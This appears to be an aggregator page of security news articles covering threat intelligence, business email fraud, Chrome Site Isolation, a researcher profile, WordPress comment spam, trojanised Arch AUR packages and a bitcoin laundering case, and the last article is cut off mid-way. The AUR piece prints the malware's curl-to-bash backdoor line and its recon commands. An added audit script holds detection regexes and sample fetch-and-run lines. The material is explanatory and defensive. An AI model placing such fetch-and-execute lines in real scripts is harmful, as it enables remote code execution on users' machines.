STE WILLIAMS

How to Structure an Enterprise-Wide Threat Intelligence Strategy

To keep an organization safe, you must think about the entire IT ecosystem.

The ever-expanding range and diversity of cyber threats make it difficult for organizations to prioritize their offensive and defensive strategies against attackers. From malware, ransomware, and other attacks coming from the outside, to insider threats and system vulnerabilities from within, today’s expanded attack surfaces cut across the whole enterprise landscape — and that means an enterprise’s threat intelligence strategy must address the entire IT ecosystem.

To be effective, threat intelligence must be proactive, comprehensive, and done in a way that doesn’t inadvertently create more risk. Unfortunately, as a recent Ponemon survey illustrates, most organizations fall short of this goal — tripped up by a range of challenges, including a lack of expertise and overwhelming volumes of data. Improved threat intelligence comes from improving the strategy, techniques, and tools employed by enterprises to probe their networks for weakness and shore up defenses and resiliency.

A “Dirty Internet” of Threats and Vulnerabilities
The digital universe is vast, but it’s also “dirty” in the sense of data seeping across perimeters and network boundaries. This “digital exhaust” — evidence of visits, searches, purchases, and other behaviors that users leave behind on the Internet — is growing quickly and is grist for hackers looking to penetrate systems and databases.

Unfortunately, one of the most valuable forms of digital exhaust comes as a by-product of poorly designed threat intelligence. Too often, threat intelligence involves tools and processes that, while designed to monitor the perimeter and internal systems for threats, unwittingly leave behind artifacts of that troubleshooting activity that malicious actors can ultimately use against the organization. 

This “fly on the wall” process of observation could even uncover specifics about who is conducting the threat intelligence and what devices they’re using. Adding to the challenge, today’s threat actors are sophisticated enough that firewalls, VPNs, proxy servers, and other traditional secure access solutions are too weak to stop them.

What’s needed is a new approach to operating on the Internet that makes use of managed attribution techniques, including data obfuscation, identity and location masking, and multiple levels of encryption and authentication to reduce and virtually eliminate the attack surface. In other words, an ideal threat intelligence strategy would not only protect data from breaches but also protect data in the event of a breach. Both goals can be achieved.

Anonymity and Managed Attribution
Anonymity is an important component. This is where technology is used to conceal your identity, location, and details about the device you are using as you conduct threat intelligence. Managed attribution takes things a step further, not only hiding your identity and location, but actually making it appear as if you are someone else operating from somewhere else — a soccer parent in Manitoba, say, instead of a systems analyst in Arlington, Virginia.

Further, organizations need to manage both the technical and personal side of user identities. Technical attribution might involve a virtual desktop that’s clean and separate from the data on an actual device; there are even systems that frequently and randomly swap IP addresses at the point of presence. Personal attribution, meanwhile, involves multiple profiles that can be swapped out as quickly and easily as signing in and out of the platform. Suddenly, the soccer parent in Manitoba becomes a street merchant in Madrid. 

Securing Data for a Secure Future
Ultimately, the entire network architecture should be cloaked from the view of threat actors looking to seize access and advantage. This involves obfuscating network operations through a cloud of encryption and IP hopping capabilities that mask user and organizational data through a series of complex pathways, directory nodes, and networking hops that scramble the meaning and context around data and its users.

While the attack surface can’t be eliminated entirely, obfuscation can turn that surface into a meaningless or unappealing target to potential threat actors. It’s even possible to obfuscate entire pieces of infrastructure — email systems, application servers, and storage facilities — and this can all be designed and implemented in the cloud.

The innovation around threat intelligence is constant, and for good reason. It’s not just that organizations need to protect assets today; they also need to be prepared (as much as possible) for tomorrow’s unknown and unknowable threats. Effective threat intelligence can also help organizations meet regulations such as the EU’s General Data Protection Regulation as well as existing standards that require them to employ technical and organizational measures that ensure an appropriate level of security.

For all these reasons, improved threat intelligence can and should be a priority for any organization or government agency. The right strategies, tools, and partners can lead to a higher level of security that keeps both cyber-threat teams and organizational data safe and secure from evolving and ever-growing cyber threats.


Tom Badders is the Senior Product Manager for Secure Mobility Products and Services at Telos Corporation, a leading provider of continuous security solutions and services for the world’s most security-conscious agencies and organizations. Leveraging over 40 years of …

Article source: https://www.darkreading.com/threat-intelligence/how-to-structure-an-enterprise-wide-threat-intelligence-strategy/a/d-id/1332244?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

FBI: Email Account Compromise Losses Reach $12B

There were more than 78K business email compromise (BEC) and email account compromise (EAC) scam incidents worldwide between October 2013 and May 2018.

New FBI data shows that business email compromise (BEC) and email account compromise (EAC) scam losses worldwide spiked 136% from December 2016 to May 2018.

There were 78,617 BEC/EAC incidents reported between October 2013 and May 2018, resulting in $12 billion in losses. Of those incidents, 41,058 were in the US, resulting in $2.9 billion in losses. China and Hong Kong banks led the locations for receipt of fraudulent funds, while the UK, Mexico, and Turkey are emerging regions, the FBI report shows.

“The scam may not always be associated with a request for transfer of funds. A variation of the scam involves compromising legitimate business e-mail accounts and requesting Personally Identifiable Information (PII) or Wage and Tax Statement (W-2) forms for employees,” the FBI said in its public service announcement reporting the latest statistics.

The real estate industry is the new hot target: from 2015 to 2017, there was a 1,100% increase in BEC/EAC victims in that sector.


Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/threat-intelligence/fbi-email-account-compromise-losses-reach-$12b-/d/d-id/1332294?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Google’s ghost busters: We can scare off Spectre haunting Chrome tabs

Google is touting the benefits of a recently rolled out browser security feature called Site Isolation.

Site Isolation has been gradually introduced to users of the Chrome browser over several months, and now Google has officially unveiled this important piece of tech.

With Site Isolation enabled, Chrome runs a different browser process for each internet domain. Google initially described Site Isolation as an “additional security boundary between websites,” preventing malicious webpages in a tab from messing with or spying on tabs and iframes displaying pages from other domains.

Rather than solely defending against cross-site scripting attacks, the technology is now positioned as a necessary defence against infamous data-leaking Spectre CPU vulnerabilities, as a blog post by Google explained this week:

Speculative execution side-channel attacks like Spectre are a newly discovered security risk for web browsers. A website could use such attacks to steal data or login information from other websites that are open in the browser. To better mitigate these attacks, we’re excited to announce that Chrome 67 has enabled a security feature called Site Isolation on Windows, Mac, Linux, and Chrome OS.

Site Isolation has been optionally available as an experimental enterprise policy since Chrome 63, but many known issues have been resolved since then, making it practical to enable by default for all desktop Chrome users.

In other words, on Windows, macOS, Linux, and Chrome OS devices, Chrome uses the security boundaries provided by the operating system to ringfence each domain into its own browser process. Threads rendering a page in one process cannot interfere with or snoop on other sites, whether via speculative execution or crafty JavaScript, which prevents malicious pages from lifting passwords and other secrets.

Site Isolation was enabled by default on desktops with the release of Chrome 67, at the end of May, as previously reported.

In its blog post, Google goes on to explain how the tech works, adding that it had been working on Site Isolation even before Spectre appeared in January:

When Site Isolation is enabled, each renderer process contains documents from at most one site. This means all navigations to cross-site documents cause a tab to switch processes. It also means all cross-site iframes are put into a different process than their parent frame, using “out-of-process iframes.”

Splitting a single page across multiple processes is a major change to how Chrome works, and the Chrome Security team has been pursuing this for several years, independently of Spectre.

Site Isolation changes Chrome’s behaviour under the hood, but this “generally shouldn’t cause visible changes for most users or web developers,” according to Google. Although the vast majority (99 per cent) of Chrome users are being moved onto Site Isolation by default, Google is keeping one in 100 on a temporary holdback to “monitor and improve performance.”
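As an added example (not Google’s or Chromium’s code), here is a small Python model of the process-assignment rule Google describes: every frame goes to a renderer process locked to one site, cross-site iframes land out of process, and a cross-site navigation swaps processes. It assumes Chrome’s definition of a site, scheme plus registrable domain (eTLD+1), and uses a constructed four-entry stub in place of the public suffix list; the one-process-per-site rule is a simplification, since Chrome can run several processes for the same site.

```python
"""Toy model of Site Isolation's process assignment. Added example, not
Chrome's code. Assumes Chrome's definition of a "site" (URL scheme plus the
registrable domain, eTLD+1) and a constructed stub of the public suffix list."""
from urllib.parse import urlsplit

# Constructed stub of the public suffix list; the real list has thousands of entries.
PUBLIC_SUFFIXES = {"com", "org", "co.uk", "github.io"}


def site_of(url: str) -> str:
    """Return the isolation key for a URL: scheme plus registrable domain."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    labels = host.split(".")
    # Longest public suffix wins; the registrable domain is one label above it.
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES and i > 0:
            return f"{parts.scheme}://{'.'.join(labels[i - 1:])}"
    return f"{parts.scheme}://{host}"


class RendererPool:
    """Frames are placed so that no renderer process ever holds documents
    from more than one site. Simplification: one process per site, whereas
    Chrome may use several processes for the same site."""

    def __init__(self) -> None:
        self._next_pid = 1
        self.process_site: dict[int, str] = {}   # pid -> site it is locked to
        self.frame_pid: dict[str, int] = {}      # frame id -> pid

    def _process_for(self, site: str) -> int:
        for pid, s in self.process_site.items():
            if s == site:
                return pid
        pid, self._next_pid = self._next_pid, self._next_pid + 1
        self.process_site[pid] = site
        return pid

    def navigate(self, frame_id: str, url: str) -> tuple:
        """Navigate a frame to url. Returns (previous_pid, new_pid); a
        cross-site navigation yields a process swap, a same-site one does not."""
        previous = self.frame_pid.get(frame_id)
        pid = self._process_for(site_of(url))
        self.frame_pid[frame_id] = pid
        return previous, pid

    def same_process(self, frame_a: str, frame_b: str) -> bool:
        return self.frame_pid[frame_a] == self.frame_pid[frame_b]


def demo() -> dict:
    """Walk through the behaviours Google describes: cross-site iframes are
    out-of-process, same-site frames share, cross-site navigation swaps."""
    pool = RendererPool()
    pool.navigate("tab", "https://accounts.bank.com/login")
    pool.navigate("tab/ad-iframe", "https://ads.tracker.com/w.html")
    pool.navigate("tab/help-iframe", "https://help.bank.com/faq")
    result = {
        "ad_iframe_out_of_process": not pool.same_process("tab", "tab/ad-iframe"),
        "help_iframe_shares_process": pool.same_process("tab", "tab/help-iframe"),
    }
    before, after = pool.navigate("tab", "https://www.bank.com/home")
    result["same_site_nav_swaps"] = before != after
    before, after = pool.navigate("tab", "https://www.news.org/story")
    result["cross_site_nav_swaps"] = before != after
    # Scheme is part of the site key, so http:// and https:// never share.
    before, after = pool.navigate("tab", "http://www.news.org/story")
    result["scheme_change_swaps"] = before != after
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On a real desktop Chrome, chrome://process-internals lists the site each renderer process is locked to, so a page whose iframes come from other sites should show those iframes in separate processes.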

[Figure: diagram of Chrome’s Site Isolation. With Site Isolation, a single page may now be split across multiple renderer processes, preventing bad sites from snooping on legit ones. Source: Google]

Spectre mitigations in software have been known to impair the performance of applications, but it doesn’t seem the Chocolate Factory fears any major issues. The long soft launch of the technology provided plenty of time to iron out any wrinkles, after all.

Google is investigating how to extend Site Isolation coverage to Chrome for Android, where there are additional known issues. Ahead of prime time, experimental enterprise policies for enabling Site Isolation will be available in Chrome 68 for Android.


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/12/chrome_site_isolation/

What’s Cooking With Caleb Sima

Security Pro File: Web app security pioneer dishes on his teenage security career, his love of electric scooters, Ace Ventura – and a new baby food business venture with his wife and famed chef, Kathy Fang.

A garbled pager message was how Caleb Sima learned that he had landed his first interview for a security position. It was the mid-’90s, before online job sites – when job boards were all the rage and pagers, not iPhones, served as personal mobile communicators.

Sima, then a teenager, had spotted a job opening for a security engineer at a company called SecurityFirst in Atlanta. “It was super-unusual. Nobody had positions called ‘security’” then, he recalls. Sima’s pager had broken, so the callback number didn’t display fully on the device. As a result, he had to painstakingly dig through his call logs to find the phone number to respond and set up the interview.

He got the job, where his main responsibility was firewall management for the company’s data center. It was there he got his hands on the intrusion detection system (IDS) tool RealSecure by Internet Security Systems (ISS). “I was constantly finding ways to bypass it. I was on the phone with ISS all the time with their engineering team,” he recalls.

ISS (now part of IBM) eventually hired Sima, where his first position was on the quality assurance team. A few months later, he was recruited to ISS’s elite X-Force white-hat hacking team. Of note, he was only 17 years old. Sima, who had dropped out of high school during the Internet boom, says ISS became his real-world school. “There were guys sitting in a room reverse-engineering software, and I was writing code for signatures, finding exploits, and all of the rest of that stuff,” he says.

This was where the renowned pioneer of Web application security first started finding security holes in Web applications. Web pen testing wasn’t really a thing yet in the mid- to late-’90s, so Sima and his colleagues were charting new territory.

“I started finding SQL injection before they called it [that],” Sima says.


In one of his first pen-test engagements, he was able to gain admin access to the Web server – with less than a day of hacking. “There was a login form only, nothing else, so that was the only thing I could target,” Sima recalls.

But he hit the mother lode after noticing the Web page source included a thread of comments between the Web admin and developer that showed the admin page information. “I was like, ‘Holy crap, who puts that stuff in Web pages?” he recalls. So he got admin access and uploaded his own scripts to the server.

During a client pen-testing engagement for ISS at BellSouth, Sima demonstrated to the head of security how an attacker could hack into the company’s website and grab customer information, such as billing. BellSouth was sold and wanted Sima to create a tool. Sima recalls the manager’s reaction: “‘Dude, you need to make a product that automates that stuff; I would buy it.'”  

With the blessing of ISS, Sima built the Web testing tool as a freelance project for the former regional telco. He made $20,000.

Sima took the basic automated scripts he had and then rolled them into an automated hacking tool that ultimately evolved into his first commercial product, WebInspect, and the core of his first startup, SPI Dynamics. “At first it was just me working on this thing with scripts and doing consulting on my own to bring in cash,” he says of his startup’s early days. He later brought in his co-founders, Brian Christian and Wade Malone, to officially launch the company.

“No one would give us money” at first, he says. The team worked out of a dingy, one-room office located behind a strip club in downtown Atlanta. “We would find needles, bullet-shell casings in the parking lot,” he says, and they’d see cops on stakeouts there during the day. “We couldn’t pay the bills at times.” 

But by 2002, SPI Dynamics finally began to take off and raise capital. In 2007 the company was acquired by HP, which had been competing with IBM for a Web app-scanning tool purchase. Sima became chief technologist for HP’s Application Security Center, where he headed up its security solutions and led development of a cloud-based security service.

His flair for demonstrating website vulnerabilities shocked a few HP software employees during a presentation he gave for them. Sima showed how he could hack into the HP Expense and HR system via a Web application. “I could get all the execs’ comp; I was able to [theoretically] fire or give them raises,” he says. Of course, “I blacked out the comp information,” he adds, and had received permission from management beforehand for the demo he hoped would help hit home the importance of Web security.

Sima once even hacked into his dentist office’s Internet kiosk via a cross-site scripting (XSS) flaw to show how he could pivot into sensitive systems. “I pointed out to my dentist office that I was able to get access to the patient records through their kiosk via XSS,” he told Dark Reading in a 2007 interview.

After three years at HP, Sima departed for code analysis firm Armorize and, later, CodeSecure, where he served as CEO for over a year.

Enterprise Bug
All that was missing from Sima’s resume was an enterprise gig. That came in 2016, when he joined Capital One as its managing vice president of cybersecurity. Frustrated that there were too many security startups flooding the market and spreading hype, he saw the Capital One position as an opportunity to get up close and dig into the actual problems organizations were facing with security. Vendors don’t typically know the whole picture of security challenges companies face, he says.

Among the projects Sima spearheaded at the bank was a vendor relationship program aimed at streamlining and improving communications with security vendors pitching their wares. Not surprisingly, large organizations such as Capital One get inundated with vendor pitches and contacts. Among the requirements of the project: that vendors in their initial outreach give an elevator pitch about their products and the problems they solve, as well as a video link to a demo. Then the bank would respond quickly regarding whether to set up a meeting.

It provided the firm with basic “rules of engagement” for vendors: “If you want to pitch to us, here’s what I need from you,” Sima explains.

As part of the process, Sima also helped set up at Capital One a “cyber test kitchen,” a designated test lab for the proof-of-concept phase of testing vendor products by the security teams assigned to certain vendor products.

Sima left Capital One last November. “I was traveling two weeks out of the month” between his home in San Francisco and the company’s home offices in the Washington, D.C., area, he says. “My daughter was born, and I said, ‘I gotta call it.'”

In the Real Kitchen
Sima has since moved from the cyber test kitchen to a side business out of his real kitchen (not to mention he completed Harvard Biz School’s Program for Leadership Development). He’s currently teaming with his wife – famed chef Kathy Fang – to launch a new baby-food business that evolved out of Fang’s personal experience of making her own baby food for their eight-month-old daughter Ava. Fang, head chef and owner of Fang restaurant in San Francisco, had been making her own baby food for Ava for a healthier and broader palate option than commercial baby foods. “We started like many parents, buying our vegetables … blending and turning them into puree that you would freeze and melt and feed to your baby,” Sima says.

After watching a chef on a cooking show freeze-dry a ramen broth that maintained both the taste and nutrients, Fang, who also holds a champion title on the Food Network’s popular “Chopped” series, decided to test the process out on her homemade baby food. It worked, and the couple started carrying the freeze-dried powder food with them on outings and social events with Ava. Their friends began asking Fang if they could buy the freeze-dried meals, which are prepared with warm water or breast milk.

“Now it’s in demand,” Sima says of the baby food, which has names like “My Sweet Pea” (sugar snap peas, baby spinach, and baby kale), “Goldilocks Chicken Porridge” (chicken breast broth, koshihikari rice), and “Smashing Pumpkins” (kabocha, pumpkin, and carrots). The couple is in the process of setting up the new side business.

Even for a veteran entrepreneur like Sima, doing so has been a whole new experience, including meeting with a food lawyer (yes, there is such thing). “What are the laws with baby food, getting a co-packer, what it looks like to scale” and how to get licenses are some of the legal issues, he says.


He’s also helping security startups. Sima, CEO and co-founder of Bluebox Security, currently serves on the board of pen-testing-as-a-service firm Cobalt.io. In addition, he is working with venture capital firms as well as what he describes as an “offensive wireless gig” for a client using a product he built “that’s not quite public yet.”

Sima has some unfinished business in enterprise security, though. “I want to go back to the enterprise side again. I feel like there’s more for me to learn,” he says.

PERSONALITY BYTES

First hack: Figuring out how to run the first version of Doom on only 2MB of RAM by not loading the audio driver.

What Sima’s co-workers don’t know about him that would surprise them: I have the entire dialogue for the first “Ace Ventura” movie memorized.

Security must-haves: Single sign-on and the sentry from the first “Robocop” movie.

Fun fact: I could walk into a kitchen at a Long John Silver’s today and immediately be their best cook.

On the state of WebAppSec: I don’t think it’s evolved that much at all.

Quotable: I was never a foodie, and I’m still not a foodie.

Comfort food: Portuguese sausage, scrambled eggs, and rice-spam musubi.

In his music playlist right now: Tool, Korn, Disturbed, Linkin Park

Ride: Electric scooters until SF decided to ban them.

R&R: Playing with my daughter!

Next career: Bartender at a bar on the beach.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise …

Article source: https://www.darkreading.com/application-security/whats-cooking-with-caleb-sima/d/d-id/1332288?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

WordPress Sites Targeted in World Cup-Themed Spam Scam

Spammers are using a ‘spray & pray’ approach to post comments on WordPress-powered blogs and forums, says Imperva.

WordPress-powered websites are being targeted in a comment spam campaign designed to get users to click on links to sites offering betting services on the 2018 FIFA World Cup games.

Security vendor Imperva recently observed a botnet spewing out meaningless text messages generated from a template to comments sections in blogs, news articles, and other sites that allow people to comment.

The spambot has been attempting to post comments to the same Uniform Resource Identifier (URI) across different WordPress sites indiscriminately and without regard for whether the site is vulnerable or even has a comments section.

The template that is being used to generate the messages has been around since at least 2013 and essentially gives spammers an automated way to craft slightly different versions of the same message. For example, one version of a message generated via the template might begin with ‘I have been surfing online more than 2 hours today, yet I never found an interesting article like yours’. Another version might say, ‘I have been browsing online more than three hours today, yet I never found an interesting article like yours.’

“Our analysis found that the top 10 links advertised by the botnet lead to World Cup betting sites,” Imperva said in its report on the campaign. “Interestingly, eight of the top advertised sites contained links to the same betting site, hinting that they might be connected in a way.”

The botnet itself is comprised of some 1,200 unique IPs, which by today’s measures is not especially large. In many cases that Imperva analyzed, the botnet has been using URL-shortening, URL redirection, and other techniques to try and hide the destination of advertised links in its spam messages.

In the weeks leading up to the World Cup, the botnet was being used in remote code execution attacks and other attacks on WordPress sites. But once the games started, the botnet’s main activity shifted to comment spam. This suggests that the botnet is available for hire and that the betting sites being advertised via the current spam campaign are the ones paying for it, says Jonathan Azaria, security researcher at Imperva.

“Either the owners, or someone that benefits directly from the increased traffic via an affiliate program, for example,” looks to be behind the campaign, he says.

Comment spam — like other forms of spam — has been around for a long time, but it continues to be popular among threat actors because of how effective it is at delivering marketing messages or links to websites via comments on online forums.

WordPress itself has called comment spam a “fact of life” for anyone with a blog and has offered numerous tips and links on how to mitigate the issue.

The most common approaches have been to blacklist the IPs sending spam messages and also the URLs they advertise. Plug-ins are readily available for vetting comment submissions and ensuring comments and posts are not being generated by a spambot.

“Numerous solutions exist for comment spam,” Azaria says. “In some cases, a simple plugin will suffice. In others, a more complex solution is required such as a WAF, Captcha, [or a] bot detection and classification [tool],” he says.
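Because the template only swaps a few words and numbers between renderings, a comment screen can catch the variants by comparing token sets rather than exact strings. The Python below is an added example, not Imperva’s or WordPress’s code: it normalises numbers (digits and number words) to one token and scores each constructed inbound comment by Jaccard similarity against the template sentence quoted above; the 0.6 threshold is an assumption.

```python
"""Score incoming blog comments against a known spam template so that
template-spun variants are caught before publication. Added example, not
Imperva's or WordPress's code. The inbound comments are constructed; the
exemplar is the template rendering quoted in the article."""
import re

NUMBER_WORDS = {"one", "two", "three", "four", "five", "six", "seven",
                "eight", "nine", "ten"}

# One known rendering of the spam template.
TEMPLATE_EXEMPLARS = [
    "I have been surfing online more than 2 hours today, yet I never "
    "found an interesting article like yours."
]


def normalize(text: str) -> set:
    """Lower-case, replace every number (digits or words) with a <n> token
    so '2 hours' and 'three hours' compare equal, and return the token set."""
    text = re.sub(r"\d+", " <n> ", text.lower())
    tokens = re.findall(r"<n>|[a-z']+", text)
    return {"<n>" if t in NUMBER_WORDS else t for t in tokens}


def jaccard(a: set, b: set) -> float:
    return len(a & b) / len(a | b) if (a or b) else 0.0


def template_score(comment: str, exemplars=TEMPLATE_EXEMPLARS) -> float:
    """Highest similarity between the comment and any known template."""
    tokens = normalize(comment)
    return max(jaccard(tokens, normalize(e)) for e in exemplars)


def classify(comments: list, threshold: float = 0.6) -> list:
    """Return (comment, score, flagged) per comment; threshold is an assumption."""
    out = []
    for c in comments:
        score = template_score(c)
        out.append((c, round(score, 3), score >= threshold))
    return out


# Constructed inbound comments: a light spin of the template, a genuine
# comment, and a heavily spun variant that word overlap alone will not catch.
SAMPLE_COMMENTS = [
    "I have been browsing online more than three hours today, yet I never "
    "found an interesting article like yours.",
    "Thanks, this fixed my nginx config issue, the second example was the key.",
    "I've been browsing on-line greater than 3 hours these days, but I by no "
    "means discovered any fascinating article like yours.",
]

if __name__ == "__main__":
    for comment, score, flagged in classify(SAMPLE_COMMENTS):
        print(f"{'SPAM' if flagged else 'ok  '} {score:.2f}  {comment[:60]}")
```

The third sample comment, a heavier synonym spin of the same template, scores only 0.25 and slips through; that gap is what the WAF, CAPTCHA and bot-classification tools Azaria mentions are meant to close.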


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: https://www.darkreading.com/endpoint/wordpress-sites-targeted-in-world-cup-themed-spam-scam/d/d-id/1332291?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Another Linux community with malware woes

Another day, another Linux community with malware woes.

Last time it was Gentoo, a hard-core, source-based Linux distribution that is popular with techies who like to spend hours tweaking their entire operating system and rebuilding all their software from scratch to wring a few percentage points of performance out of it.

That sort of thing isn’t for everyone, but it’s harmless fun and it does give you loads of insight into how everything fits together.

That sets it apart from distros such as ElementaryOS and Mint, which rival and even exceed Windows and macOS for ease of installation and use, but don’t leave you with much of a sense of how it all actually works.

This time, the malware poisoning happened to Arch Linux, another distro we’d characterise as hard-core, though very much more widely used than Gentoo.

Three downloadable software packages in the AUR, short for Arch User Repository, were found to have been rebuilt so they contained what you might (perhaps slightly unkindly) refer to as zombie downloader robot overlord malware.

Bots or zombies are malware programs that call home to fetch instructions from the crooks on what to do next.

The hacked packages were: acroread 9.5.5-8, balz 1.20-3 and minergate 8.1-2; they’ve all apparently been restored to their pre-infection state.

What happened?

Simply put, the packages had one line added – on Linux, the core functionality of a bot can be trivially condensed into a single line:

   curl -s https://[redacted]/~x|bash - &

This single line of code, part of an installation script written in the Bash language, fetches a text file from a command-and-control (C&C) server and runs it as a script in its own right.

The command curl is a program that fetches a web page using HTTP or HTTPS. The pipe character (|) is Unix shorthand for “use the output of the command on the left directly as the input of the command on the right”. And bash - says to read and use the data that’s coming as input, denoted by the dash (-), directly as a script program. The pipe character therefore means you don’t need to run one command to fetch a file and then tell the next command to read the same file back in – the data is, literally and figuratively, piped between the two programs via memory. Finally, the ampersand (&) means to run the whole thing in the background so that it’s as good as invisible.

This means that the attacker can change the behaviour of the malware at any time by altering the commands stored in the file ~x on the C&C server.

At present, the ~x command sets up a regular background task – the Linux equivalent of a Windows service – that repeatedly runs a second script called u.sh that’s downloaded from the web page ~u on the same C&C server.

The u.sh file tries to extract some basic data about the infected system, and to upload it to a Pastebin account.

The system data that the u.sh malware is interested in comes from the following Arch commands:

 echo ${MACHINE_ID}    -- this computer's unique ID (randomly generated at install time)
 date '+%s'            -- the current date and time
 uname -a              -- details about the Linux version that's loaded
 id                    -- details about the user account running the script
 lscpu                 -- technical details about the system processor chip
 pacman -Qeq           -- the software you've installed (Qe means "query explicit")
 pacman -Qdq           -- any extra software needed to go with it (Qd means "query dependencies")
 systemctl list-units  -- all the system services

Fortunately, the part of the script that does the data exfiltration contains a programming error, so the upload never happens.
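The one-line downloader above is easy to spot mechanically. The following Python audit, an added example that is not Arch’s or Sophos’s code, scans a PKGBUILD or .install script for a remote fetch whose output is piped into a shell, for the eval and process-substitution equivalents (a generalisation of the pattern on this page), and for the trailing ampersand that backgrounds the command. The sample .install text is constructed, and example.invalid stands in for the redacted C&C host.

```python
"""Audit an AUR package's build/install scripts for "fetch a remote file and
pipe it straight into a shell". Added example, not Arch's or Sophos's code.
The sample .install text is constructed; example.invalid is a placeholder
for the redacted C&C server."""
import re
from dataclasses import dataclass, field

# Remote fetch whose output is piped into an interpreter: curl ... | bash -
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:bash|sh|dash|zsh)\b"
)
# Generalisations of the same idea (assumption: worth flagging in an audit):
# eval "$(curl ...)" and bash <(curl ...)
EVAL_REMOTE = re.compile(
    r"eval\s+[\"']?\$\(\s*(?:curl|wget)\b|\b(?:bash|sh)\s+<\(\s*(?:curl|wget)\b"
)
# A single trailing ampersand backgrounds the command so it is as good as invisible.
BACKGROUNDED = re.compile(r"(?<!&)&\s*$")


@dataclass
class Finding:
    lineno: int
    line: str
    reasons: list = field(default_factory=list)


def audit_script(text: str) -> list:
    """Return one Finding per suspicious line, with the reasons it tripped."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        # Simplification: drop everything after '#', which also truncates a
        # '#' inside a quoted string; fine for a first-pass audit.
        line = raw.split("#", 1)[0].rstrip()
        reasons = []
        if PIPE_TO_SHELL.search(line):
            reasons.append("remote content piped to a shell")
        if EVAL_REMOTE.search(line):
            reasons.append("remote content evaluated by a shell")
        if reasons and BACKGROUNDED.search(line):
            reasons.append("backgrounded with &")
        if reasons:
            findings.append(Finding(lineno, raw.strip(), reasons))
    return findings


# Constructed sample of a package .install file: one benign download,
# then three lines of the kind an audit should stop on.
SAMPLE_INSTALL = """\
# constructed example .install file
post_install() {
  curl -sL https://example.invalid/notes.txt -o /tmp/notes.txt
  echo "Installed."
  curl -s https://example.invalid/~x|bash - &
  wget -qO- https://example.invalid/setup.sh | sh
  eval "$(curl -s https://example.invalid/env.sh)"
}
"""

if __name__ == "__main__":
    for f in audit_script(SAMPLE_INSTALL):
        print(f"line {f.lineno}: {f.line}\n    {', '.join(f.reasons)}")
```

Run it over a package’s PKGBUILD and .install files before makepkg; a clean result is a first pass, not a verdict, since the patterns only cover the direct fetch-and-execute forms shown here.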

The Arch reaction

Arch is well-respected for the enormous quantity of community documentation it has published in recent years – users of many other distros often find themselves referring to Arch Linux documentation pages to learn what they need to know.

Where Arch has been – how can we say this? – a little less likable, is the extent to which the distro’s culture mirrors the aggressive “alpha techiness” of the King of Linux, Linus Torvalds himself – a man who is on record for numerous intolerant, insulting and frequently purposeless outbursts aimed at those he thinks are in the way.

So we weren’t entirely surprised to see this online response from one of the luminati of the Arch community, dismissing the malware with a petulant “meh”:

This would be a warning for what exactly? That orphaned packages can be adopted by anyone? That we have a big bold disclaimer on the front page of the AUR clearly stating that you should use any content at your own risk?

This thread is attracting way more attention than warranted. I’m surprised that this type of silly package takeover and malware introduction doesn’t happen more often.

To be fair to the Arch team, the hacked packages were found on AUR, which is the Arch User Repository, which isn’t vouched for or vetted by the Arch maintainers – in the same sort of way that none of the off-market Android forums are vouched for by Google.

Nevertheless, the AUR site is logoed up and branded as the Arch User Repository, not merely the User Repository, so a bit less attitude from the Arch team wouldn’t hurt.

What to do?

You might not like Arch’s attitude – and if you don’t, you’re probably using a different distro anyway – but the warning on the community-operated Arch User Repository does, in fact, say it all, even if we’d sneak a hyphen between “user” and “produced”:

DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.

If you don’t trust it, don’t install it.


Note. We don’t expect this thing to be a problem in real life, but Sophos products will nevertheless detect the abovementioned scripts as Linux/BckDr-RVR, and block the CC URLs used to “feed” the attack. (If you’d like to try Sophos Anti-Virus for Linux, by the way, it’s 100% free both at work and at home.)


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/aaF7oCf1Ax8/

“Bitcoins for cash in bags” trader gets 12 months in prison

Anacoluthon – we love it!

(That’s where a sentence has some sort of grammatical inconsistency or ambiguity that jars you into thoughtfulness, then I went for a walk by the River Thames.)

We find anacoluthon as fascinating as cryptocurrency shenanigans, so we were doubly intrigued by a recent Ars Technica headline – Woman who once bought bitcoins for cash in paper bags sent to prison.

We were dying to untangle the ambiguity here – did the bags contain the cash, or did the bags contain the bitcoins?

Were the bags sent to prison, or the woman?

Was she buying cash in paper bags with bitcoins, or bitcoins in paper bags with cash, or were both parts of the transaction in bags?

If the cash was in paper bags, were they brown bags, as they would be in a metaphor, or at lunch, and if not, why not?

Heck, these days, if someone actually buys and sells bitcoins in person for real, hard cash, don’t they deserve some sort of medal?

When you think of how often cryptocurrency buyers and sellers have gone through online exchanges and ended up out of pocket following some sort of cybersecurity catastrophe, real or imaginary, aren’t cash buyers to be applauded?

So many questions, and we hadn’t got past the headline yet!

We found the full story in what’s called the Sentencing Position document filed by the United States of America in its federal court case against Theresa Tetley, aka the “Bitcoin Maven”.

The Bitcoin Maven (a maven, in case you are wondering, is an expert or connoisseur) had already pleaded guilty to money laundering charges relating to bitcoins; this time she was back in court to be sentenced.

Simply put, Tetley did indeed buy bitcoins for hard cash, according to the prosecutors.

Buying bitcoins, even for hard cash, even in huge amounts, isn’t illegal, provided that you comply with the relevant laws relating to trading in cash.

And that’s where she got into trouble.

Firstly, if you do cash trades as your profession, rather than just as a hobby, you’re a “money transmitting business” and you need to register, something Tetley didn’t do.

